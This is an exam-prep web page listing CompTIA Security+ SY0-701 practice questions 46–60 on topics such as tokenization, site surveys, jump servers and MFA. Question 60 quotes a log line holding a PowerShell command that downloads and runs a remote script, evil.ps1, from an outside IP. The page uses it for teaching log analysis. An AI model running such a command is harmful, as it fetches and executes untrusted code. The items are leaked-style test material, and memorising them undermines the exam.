Pre-Summer Special Limited Time 70% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: force70

Pass the CompTIA CompTIA Security+ SY0-701 Questions and answers with CertsForce

Viewing page 4 out of 17 pages
Viewing questions 46-60 out of questions
Questions # 46:

Which solution is most likely used in the financial industry to mask sensitive data?

Options:

A.

Tokenization


B.

Hashing


C.

Salting


D.

Steganography


Expert Solution
Questions # 47:

A store is setting up wireless access for employees. Management wants to limit the number of access points while ensuring full coverage. Which tool will help determine how many access points are needed?

Options:

A.

Signal locator


B.

WPA3


C.

Heat map


D.

Site survey


Expert Solution
Questions # 48:

A new vulnerability enables a type of malware that allows the unauthorized movement of data from a system. Which of the following would detect this behavior?

Options:

A.

Implementing encryption


B.

Monitoring outbound traffic


C.

Using default settings


D.

Closing all open ports


Expert Solution
Questions # 49:

A company prevented direct access from the database administrators’ workstations to the network segment that contains database servers. Which of the following should a database administrator use to access the database servers?

Options:

A.

Jump server


B.

RADIUS


C.

HSM


D.

Load balancer


Expert Solution
Questions # 50:

An engineer needs to ensure that a script has not been modified before it is launched. Which of the following best provides this functionality?

Options:

A.

Masking


B.

Obfuscation


C.

Hashing


D.

Encryption


Expert Solution
Questions # 51:

An office wants to install a Wi-Fi network. The security team must ensure a secure design. The access points will be more powerful and use WPA3 with a 16-character randomized key. Which of the following should the security team do next?

Options:

A.

Create a heat map of the building perimeter.


B.

Deploy IPSec tunnels from each access point to the controller.


C.

Enable WPA2-PSK with a 24-character randomized key.


D.

Disable SSH administration on all access points.


Expert Solution
Questions # 52:

A company receives an alert that a network device vendor, which is widely used in the enterprise, has been banned by the government.

Which of the following will the company ' s general counsel most likely be concerned with during a hardware refresh of these devices?

Options:

A.

Sanctions


B.

Data sovereignty


C.

Cost of replacement


D.

Loss of license


Expert Solution
Questions # 53:

A company is currently utilizing usernames and passwords, and it wants to integrate an MFA method that is seamless, can Integrate easily into a user ' s workflow, and can utilize employee-owned devices. Which of the following will meet these requirements?

Options:

A.

Push notifications


B.

Phone call


C.

Smart card


D.

Offline backup codes


Expert Solution
Questions # 54:

A Chief Information Security Officer (CISO) has developed information security policies that relate to the software development methodology. Which of the following would the CISO most likely include in the organization ' s documentation?

Options:

A.

Peer review requirements


B.

Multifactor authentication


C.

Branch protection tests


D.

Secrets management configurations


Expert Solution
Questions # 55:

A systems administrator notices that the research and development department is not using the company VPN when accessing various company-related services and systems. Which of the following scenarios describes this activity?

Options:

A.

Espionage


B.

Data exfiltration


C.

Nation-state attack


D.

Shadow IT


Expert Solution
Questions # 56:

Which of the following would a security administrator use to comply with a secure baseline during a patch update?

Options:

A.

Information security policy


B.

Service-level expectations


C.

Standard operating procedure


D.

Test result report


Expert Solution
Questions # 57:

A security analyst discovers that a large number of employee credentials had been stolen and were being sold on the dark web. The analyst investigates and discovers that some hourly employee credentials were compromised, but salaried employee credentials were not affected.

Most employees clocked in and out while they were Inside the building using one of the kiosks connected to the network. However, some clocked out and recorded their time after leaving to go home. Only those who clocked in and out while Inside the building had credentials stolen. Each of the kiosks are on different floors, and there are multiple routers, since the business segments environments for certain business functions.

Hourly employees are required to use a website called acmetimekeeping.com to clock in and out. This website is accessible from the internet. Which of the following Is the most likely reason for this compromise?

Options:

A.

A brute-force attack was used against the time-keeping website to scan for common passwords.


B.

A malicious actor compromised the time-keeping website with malicious code using an unpatched vulnerability on the site, stealing the credentials.


C.

The internal DNS servers were poisoned and were redirecting acmetimkeeping.com to malicious domain that intercepted the credentials and then passed them through to the real site


D.

ARP poisoning affected the machines in the building and caused the kiosks lo send a copy of all the submitted credentials to a machine.machine.


Expert Solution
Questions # 58:

Which of the following describes the reason root cause analysis should be conducted as part of incident response?

Options:

A.

To gather loCs for the investigation


B.

To discover which systems have been affected


C.

To eradicate any trace of malware on the network


D.

To prevent future incidents of the same nature


Expert Solution
Questions # 59:

A security analyst must select a metric to determine the required investment in technology based on past availability incidents. Which of the following is the most relevant value to help select technology that mitigates risk and considers reliability?

Options:

A.

MTBF


B.

RTO


C.

ALE


D.

RPO


Expert Solution
Questions # 60:

A security analyst reviews the following endpoint log:

powershell -exec bypass -Command " IEX (New-Object Net.WebClient).DownloadString(http://176.30.40.50/evil.ps1 " )

Which of the following logs will help confirm an established connection to IP address 176.30.40.50?

Options:

A.

System event logs


B.

EDR logs


C.

Firewall logs


D.

Application logs


Expert Solution
Viewing page 4 out of 17 pages
Viewing questions 46-60 out of questions